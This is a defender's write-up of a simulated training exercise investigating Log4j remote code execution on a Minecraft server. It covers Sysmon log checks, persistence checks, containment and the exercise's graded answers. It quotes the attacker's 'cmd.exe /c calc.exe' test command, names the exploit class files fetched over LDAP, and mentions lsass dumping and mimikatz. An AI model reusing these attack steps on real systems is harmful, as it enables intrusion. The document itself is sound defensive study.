Incident Response: Analyzing Log4j RCE exploited via Minecraft game

We have an Incident related to Log4j activities escalated by L1 Analyst.

Vulnerability

Log4j2 versions 2.0-beta9 through 2.15.0 (excluding 2.12.x after 2.12.1) are vulnerable to remote code execution using its LDAP (Lightweight Directory Access Protocol) JNDI parser. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. The initial vulnerability designated CVE-2021–44228 was supposedly fixed in versions 2.12.2 and 2.15.0. The fix includes disabling JNDI by default and by restricting LDAP access via JNDI in log4j2’s named object lookup and JNDI manager

Investigation

We rdp into the victim host, alongside our Forensics tool file share in case we need them

The attacker abused log4j Vulnerability in minecraft game server , as this Vulnerability was in java framework used in almost every application using java codebase minecraft is built on java which makes this game vulnerable itself

Although the executed command “cmd.exe /c calc.exe” is not dangerous itself, but its suspicious on a gaming server where there is no need for this. Also Adversaries often use this command to confirm there rce etc.

We start the IR playbook for this incident and will follow the standardized procedure to complete our investigation

We first need to verify that in fact the alert was true and the jar file was ran and the cmd command also ran. Luckily sysmon was installed on the endpoint so we can through sysmon logs to verify this

We know the date and time of the incident so we will go through these logs in that time frame . Its 11 December 2021 and around 10:40 am . We will see sysmon logs between 10:30 to 1050 am to reduce the noise and immediate analysis

We verified the cmd execution

Now let us verify the jar file execution

So in fact this is true positive and we will move on to next step

Our next agenda is to verify initial access tactic

This is a minecraft server , open to external internet , meaning any player can join in minecraft lobby.

We can see minecraft log file to see more information

We can see that 2 users logged into the game lobby at around time of incident

We can also see this in our log management tab in our siem

I checked these ip reputations but both were clean and had good reputation.

But if we see logs further we can see that suspicious things were carried out by user “TestUser23”

User issued some kind of ldap network connection to some (obvious malicious files) and disconnected from the game . Again the ip was clean from where ldap connection was made, but this is obvious log4j exploitation since the exploit depends upon malicious java class files served on attacker controlled ldap servers . Two class files were contacted (exploit.class and exploit2.class)

So we can select external remote services for the answer

If you do a little research on cve in question we find that the exploit was in a parser for log files. This parser belongs to a java based utility called log4j used in almost every java based application (hence named log4j rce)

Our next question was if privilege escalation occured

Attacker got rce as user “LetsDefend” and its already in administrator group so no priv esc was required

Our next question is if any persistence was made

We see if any users have been created

Now we will see any supicious tasks scheduled

These all tasks belongs to the training exercise and nothing malicious so its safe to ignore them

So we can say that no persistence was made

Next question is regarding credentials access and since no alert was made (of lsass dump or mimikatz ) and no evidence was found on endpoint we can select answer as none. In real life we would hunt for threats fully using multiple tools but this exercise is simulated for immediate response to log4j exploitation.

Since Its safe to assume that micecraft server was vulnerable and was successfully exploited , we need to isolate the device to cut off lateral movement and perform forensics (In real scenario)

We will now contain the endpoint from endpoint management

In real life we would want to backup important files and completely reinstall os and wipe off disks in case of any rootkits etc after performing forensics and collecting artifacts

And finally recovery will be done to remediate the threat for continual service provision.

Now we take notes on all IOCs and artifacts found during investigation

We put down our IR investigation notes and close the alert

We got all our answers correct besides initial access method. We concluded that initial access was made via external remote services (Public minecraft server) but it turns out that the correct answer is public application exploited (which is more of a same thing we selected but in real life this would have been fine since It was exploited remotely from internet)